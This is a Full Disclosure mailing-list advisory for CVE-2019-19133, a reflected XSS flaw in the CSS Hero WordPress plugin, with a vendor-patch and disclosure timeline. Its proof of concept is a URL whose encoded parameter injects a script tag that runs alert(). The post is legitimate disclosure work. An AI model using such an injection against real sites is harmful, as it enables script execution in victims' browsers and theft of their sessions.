Full Disclosure mailing list archives
Reflected XSS in CSS Hero (v.4.0.3)
From: Ho oper Ca ry <cary.e.hooper () gmail com>
Date: Mon, 2 Dec 2019 19:53:38 -0600
Team, Document Title =============== CVE-2019-19133 Reflected XSS in CSS Hero (<= v.4.0.3) WordPress plugin. Product Description =============== CSS Hero WordPress Plugin A live WordPress Theme editor that works without modifying any of your theme files. Very low performance footprint: only generates and adds a single static CSS file to your site. Homepage: https://www.csshero.org/ CSS Hero is vulnerable to a reflected XSS attack (authenticated). PoC =============== Steps: 1) Authenticate to the WordPress application with the CSS Hero plugin installed. 2) Navigate to the following vulnerable link: hxxp:// vulnerable.wordpress.com/?csshero_action=edit_page&rand=1015&foo%22%3E%3C/iframe%3E%3Cscript%3Ealert(%27Reflected%20XSS%20in%20CSS%20Hero%204.0.3%27)%3C/script%3E%3Ciframe%3Ebar 3) JavaScript executes within the context of the browser. The arbitrary parameter and value are reflected into the returned HTML. Responsible Disclosure Information =============== Vendor Contacted: 11/17 Date Patched: 11/20 Patched Version: v.4.0.7 Public Disclosure: 12/2 Cary Hooper @nopantrootdance _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Reflected XSS in CSS Hero (v.4.0.3) Ho oper Ca ry (Dec 03)